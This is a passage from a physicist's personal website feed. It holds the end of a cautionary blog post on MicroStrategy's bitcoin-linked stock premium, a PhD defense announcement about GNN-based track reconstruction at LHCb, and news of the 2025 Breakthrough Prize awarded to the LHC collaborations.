<p>A significant drop in the value of bitcoin would likely lead to a decline in MicroStrategy’s stock price, <strong>compressing the premium</strong> at which the company trades relative to its bitcoin holdings. This could slow—or even reverse—the “flywheel” feedback loop described above, potentially triggering a <strong>vicious cycle that may lead the company to a spectacular crash</strong>. Bitcoin itself could also be affected by such a collapse.</p>

<h2 id="conclusion">Conclusion</h2>

<p>Jumping on the MSTR wave might indeed seem tempting, especially considering the current hype around the company and its eye-catching returns. However, investing in a company should be backed by <strong>research and fundamentals</strong>. Potential investors are encouraged to think carefully before taking any action.</p>

<blockquote>
  <p><strong>Disclaimer:</strong> The views expressed in this post are solely my own, based on publicly available information. They do not represent the views of any current or past employer. This content is not financial advice and does not make allegations of fraud or illegality.</p>
</blockquote>]]></content><author><name> </name></author><category term="Blog" /><category term="Financial Markets" /><category term="Quant" /><category term="Crypto" /><summary type="html"><![CDATA[An analysis of MicroStrategy's bitcoin-centric business model and its resemblance to pyramid schemes through dilution and speculative capital loops.]]></summary></entry><entry><title type="html">Thesis Defense Scheduled – September 5, 2025</title><link href="https://fotisgiasemis.com/news/thesis-defense-scheduled/" rel="alternate" type="text/html" title="Thesis Defense Scheduled – September 5, 2025" /><published>2025-06-10T00:00:00+02:00</published><updated>2025-06-10T00:00:00+02:00</updated><id>https://fotisgiasemis.com/news/thesis-defense-scheduled</id><content type="html" xml:base="https://fotisgiasemis.com/news/thesis-defense-scheduled/"><![CDATA[<p>I’m happy to announce that the date for my <strong>PhD defense</strong> has been decided for Friday the 5th of September 2025. My thesis titled</p>

<blockquote>
  <p><strong>“Real-Time Analysis of Unstructured Data with Machine Learning on Heterogeneous Architectures”</strong></p>
</blockquote>

<p>describes my work, along my collaborators, in developing <a href="https://doi.org/10.1088/1748-0221/19/12/P12022">ETX4VELO</a>, a <strong>Graph Neural Network-based</strong> pipeline for real-time track reconstruction at 40 MHz inside the LHCb first-level trigger. The pipeline was developed in <strong>PyTorch</strong>, implemented end to end on <strong>GPUs</strong> using the C++ CUDA framework by Nvidia, and partially implemented on <strong>FPGAs</strong> using the translation framework <a href="https://github.com/fastmachinelearning/hls4ml">HLS4ML</a>, which transforms PyTorch/Keras code to firmware for low-latency, <strong>high-throughput</strong> inference on FPGAs. For more information on the project you can also see my <a href="/projects/#-etx4velo-tracking-with-gnns">Projects page</a>. The thesis was conducted under the co-supervision of <a href="https://inspirehep.net/authors/1057204">Vava Gligorov</a> (LPNHE/CERN) and <a href="https://www.lip6.fr/actualite/personnes-fiche.php?ident=P824&amp;LANG=en">Bertrand Granado</a> (LIP6/Sorbonne Université).</p>

<p>More updates and a link to the manuscript will follow soon.</p>

<p><img src="/assets/images/front.png" alt="front" style="width:65%;" /></p>]]></content><author><name> </name></author><category term="News" /><category term="CERN" /><category term="PhD" /><category term="Machine Learning" /><category term="GPU" /><category term="FPGA" /><summary type="html"><![CDATA[Thesis defense scheduled: Real-Time Analysis of Unstructured Data with Machine Learning on Heterogeneous Architectures.]]></summary></entry><entry><title type="html">The 2025 Breakthrough Prize in Fundamental Physics Awarded to the LHCb Collaboration</title><link href="https://fotisgiasemis.com/news/breakthrough-prize-2025/" rel="alternate" type="text/html" title="The 2025 Breakthrough Prize in Fundamental Physics Awarded to the LHCb Collaboration" /><published>2025-04-08T00:00:00+02:00</published><updated>2025-04-08T00:00:00+02:00</updated><id>https://fotisgiasemis.com/news/breakthrough-prize-2025</id><content type="html" xml:base="https://fotisgiasemis.com/news/breakthrough-prize-2025/"><![CDATA[<p>The <strong>LHCb collaboration</strong>, together with the other three main Large Hadron Collider collaborations, <strong>ATLAS, CMS and ALICE</strong>, has been awarded the 2025 <a href="https://breakthroughprize.org/">Breakthrough Prize</a> in Fundamental Physics:</p>

<blockquote>
  <p>For detailed measurements of Higgs boson properties confirming the symmetry-breaking mechanism of mass generation, the discovery of new strongly interacting particles, the study of rare processes and matter-antimatter asymmetry, and the exploration of nature at the shortest distances and most extreme conditions at CERN’s Large Hadron Collider.</p>
</blockquote>

<p>The prize has been awarded to all current and former members of the four collaborations who authored papers based on Run 2 data published by 15 July 2024.</p>

<p>As stated in the <a href="https://breakthroughprize.org/Laureates/1/P1/Y2025">official page</a>, the $3 million prize is allocated to ATLAS ($1 million), CMS ($1 million), ALICE ($500,000) and LHCb ($500,000). The prize money will be used by the collaborations to offer <strong>grants for doctoral students</strong> from member institutes to spend research time at CERN, giving the students experience working at the forefront of science and new expertise to bring back to their home countries and regions. The name of each winner can be found on the experiment pages below.</p>

<p>The full list of the LHCb laureates can be found on the <a href="https://breakthroughprize.org/Laureates/1/L3995">LHCb subpage</a>.</p>

<p>Read more in the <a href="https://breakthroughprize.org/News/91">prize announcement</a> and in the <a href="https://home.cern/news/press-release/knowledge-sharing/lhc-experiment-collaborations-cern-receive-breakthrough-prize">CERN press release</a>.</p>]]></content><author><name> </name></author><category term="News" /><category term="LHCb" /><category term="CERN" /><summary type="html"><![CDATA[The 2025 Breakthrough Prize has been awarded to the main CERN collaborations, including LHCb.]]></summary></entry></feed>